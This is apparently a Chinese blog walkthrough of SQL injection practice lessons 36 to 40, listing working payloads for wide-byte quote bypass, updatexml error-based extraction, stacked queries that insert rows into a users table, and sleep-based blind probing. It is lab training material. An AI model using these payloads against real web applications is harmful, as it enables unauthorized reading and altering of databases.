1.lesson36 union select
判断注入:
为单引号注入
?id=1%df'-- +
查数据库:
?id=-1%df' union select 1,2,database()-- +
![](https://img-blog.csdnimg.cn/img_convert/bfde3389efc6a4b7aa1cc47533853002.png)
2.lesson-37 报错注入
判断注入:
为单引号注入
通过下方判断password为单引号注入
![](https://img-blog.csdnimg.cn/img_convert/c4486917e084a18e1b1e96075f49d255.png)
uname=z&passwd=g%df' -- +&submit=Submit
查数据库:
uname=z&passwd=g%df' or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&submit=Submit
![](https://img-blog.csdnimg.cn/img_convert/ab1ab46645b30bb009569c8968c33f1b.png)
3.lesson-38 堆叠注入
判断注入:
为单引号注入
因为代码有mysqli_multi_query这个函数,造成了堆叠注入,这个函数可以执行多条sql语句
往表中插入数据
?id=1';insert into users (username,password) values('11','11');%23
![](https://img-blog.csdnimg.cn/img_convert/75d6325c6da5da76e371c22a480e401f.png)
1';show database;-- +不可用,没有数据出来是因为代码只处理了第一个数据
union select 也可以查出数据
?id=-1' union select 1,2,database()-- +
![](https://img-blog.csdnimg.cn/img_convert/f042eda19677816e08dcc4343c34fb30.png)
4.lesson-39 堆叠注入
判断注入:
整型注入
?id=1';insert into users (username,password) values('22','22');%23
也可以用union select
-1 union select 1,2,database()
![](https://img-blog.csdnimg.cn/img_convert/f91c2a25adb764ba4a7fd75e48e7be9d.png)
5.lesson-40 堆叠注入
判断注入:
没有报错,使用时间盲注判读闭合符号
?id=1') and sleep(5)-- +
插入数据:
?id=1');insert into users (username,password) values('33','33');%23
也可以用union select
-1') union select 1,2,database()-- +